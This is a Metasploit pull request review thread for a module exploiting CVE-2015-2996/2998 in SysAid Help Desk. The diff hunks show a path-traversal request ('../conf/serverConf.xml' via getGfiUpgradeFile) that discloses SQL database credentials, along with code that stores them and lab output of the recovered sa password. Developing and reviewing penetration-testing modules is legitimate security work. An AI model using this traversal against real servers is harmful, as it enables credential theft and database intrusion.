### PR TITLE
Create exploit for CVE-2015-2996/8 (sysaid SQL database cred disclosure)

### PR DESCRIPTION
**Pull request by pedrib**
This module exploits two vulnerabilities in SysAid Help Desk 14.4 to obtain the SQL database credentials. This module has been tested on Windows and Linux.

### CODE REVIEW

**Comment by void-in** [comment]
@pedrib You can omit the OSVDB and reference URL entries that is currently having TODO entries. These are causing the travis to fail. Once the OSVDB entries are allocated, another commit can be pushed then.

File: modules/auxiliary/admin/http/sysaid_sql_creds.rb [hunk 1]
```diff
@@ -0,0 +1,148 @@
...
+              address: db_address,
+              service_name: database_type,
+              protocol: 'tcp',
+              workspace_id: myworkspace_id,
+              core: credential_core,
+              status: Metasploit::Model::Login::Status::UNTRIED
+            }
+            create_credential_login(database_login_data)
+          # Skip creating the Login, but tell the user about it if we cannot resolve the DB Server Hostname
+          rescue SocketError
```
Comment (void-in) [inline modules/auxiliary/admin/http/sysaid_sql_creds.rb]: I think this rescue statement should be right after the line:
```ruby
db_address = Rex::Socket.getaddress(db_address, true)
```
and all other statements should be outside the begin rescue block. This way it is easy to determine what it is rescue-ing.

File: modules/auxiliary/admin/http/sysaid_sql_creds.rb [hunk 2]
```diff
@@ -0,0 +1,148 @@
...
+            print_error "Could not resolve database server hostname."
+          end
+
+          print_status("#{peer} - Stored SQL credentials #{username}:#{password} for #{matches.captures[2]}")
+          return
+        end
+      end
+      print_error("#{peer} - Failed to obtain database credentials, response was:")
+      print_line(res.body.to_s)
```
Comment (void-in) [inline modules/auxiliary/admin/http/sysaid_sql_creds.rb]: You can combine these two statements like:
```ruby
print_error("#{peer} - Failed to obtain database credentials, response was: #{res.body}")
```

File: modules/auxiliary/admin/http/sysaid_sql_creds.rb [hunk 3]
```diff
@@ -0,0 +1,148 @@
...
+      'Author' =>
+        [
+          'Pedro Ribeiro <pedrib[at]gmail.com>' # Vulnerability discovery and MSF module
+        ],
+      'License' => MSF_LICENSE,
+      'References' =>
+        [
+          [ 'CVE', '2015-2996' ],
+          [ 'CVE', '2015-2998' ],
+          [ 'OSVDB', 'TODO' ],
```
Comment (void-in) [inline modules/auxiliary/admin/http/sysaid_sql_creds.rb]: Please see https://github.com/rapid7/metasploit-framework/pull/5474#issuecomment-108731648

**Comment by wchen-r7** [comment]
Delayed label applied. [Author pinged](https://github.com/rapid7/metasploit-framework/pull/5473#issuecomment-112560324).

File: modules/auxiliary/admin/http/sysaid_sql_creds.rb (hunk 1 above)
Comment (pedrib) [inline modules/auxiliary/admin/http/sysaid_sql_creds.rb]: Thanks for the comment - what should be the db_address set to then? 127.0.0.1?

**Comment by pedrib** [comment]
Addressed two of your comments, please see my comment above for the other one.

File: modules/auxiliary/admin/http/sysaid_sql_creds.rb (hunk 1 above)
Comment (void-in) [inline modules/auxiliary/admin/http/sysaid_sql_creds.rb]: Actually I was suggesting like:
```ruby
if database_url['localhost'] == 'localhost'
  db_address = rhost
else
  begin
    db_address = matches.captures[2]
    db_address = (db_address.index(':') ? db_address[0, db_address.index(':')] : db_address)
    db_address = Rex::Socket.getaddress(db_address, true)
  rescue
    print_error "Could not resolve database server hostname."
  end
end
```
This way the rescue is more easy to follow with the begin.

**Comment by jvazquez-r7** [comment]
I'm downloading the beta from the home page. If the beta isn't vulnerable anymore would be nice if you could provide us with installer URL if available or just a PCAP for verification (without SSL pls, otherwise a ssl capable proxy would be good enough :))

File: modules/auxiliary/admin/http/sysaid_sql_creds.rb [hunk 4]
```diff
@@ -0,0 +1,145 @@
...
+  def run
+    begin
+      res = send_request_cgi({
+        'method' => 'GET',
+        'uri' => normalize_uri(datastore['TARGETURI'], 'getGfiUpgradeFile'),
+        'vars_get' => {
+          'fileName' => '../conf/serverConf.xml'
+        },
+      })
+    rescue Rex::ConnectionRefused
```
Comment (jvazquez-r7) [inline modules/auxiliary/admin/http/sysaid_sql_creds.rb]: Prolly has more sense to rescue `Rex::ConnectionError` which will also take care of `Rex::ConnectionRefused`

File: modules/auxiliary/admin/http/sysaid_sql_creds.rb [hunk 5]
```diff
@@ -0,0 +1,145 @@
...
+      print_error("#{peer} - Could not connect.")
```
Comment (jvazquez-r7) [inline modules/auxiliary/admin/http/sysaid_sql_creds.rb]: fail_with instead of print_error/return

**Comment by pedrib** [comment]
@jvazquez-r7 I've uploaded the vulnerable version to dropbox:
https://www.dropbox.com/s/fbkydxrcbfl9j0y/SysAidServer64.exe?dl=0 (Windows)
https://www.dropbox.com/s/k0zr201ef1kfts3/sysaid-server-linux.tar.gz?dl=0 (Linux)

These are the vulnerable 14.2 version. Let me know if you need anything else!

**Comment by jvazquez-r7** [comment]
Thanks @pedrib, landed after some cleanup, see final result here: https://github.com/rapid7/metasploit-framework/commit/29718ce4e1981a960670fd4fe13332f2d0354e56

Test:

```
cremsf auxiliary(sysaid_sql_creds) > run

[*] 172.16.158.131:8080 - Stored SQL credentials sa:Password1 for localhost:1450
[*] Auxiliary module execution completed
msf auxiliary(sysaid_sql_creds) > creds
Credentials
===========

host            service           public  private    realm  private_type
----            -------           ------  -------    -----  ------------
172.16.158.131  1450/tcp (mssql)  sa      Password1         Password

msf auxiliary(sysaid_sql_creds) > exit
```

**Comment by pedrib** [comment]
@jvazquez-r7 I'm getting this on mine with your version:

msf auxiliary(sysaid_db) > run

[-] Auxiliary failed: NoMethodError undefined method `+' for nil:NilClass
[-] Call stack:
[-]   /usr/share/metasploit-framework/modules/auxiliary/admin/http/sysaid_db.rb:95:in `run'
[*] Auxiliary module execution completed

???

**Pull request merged**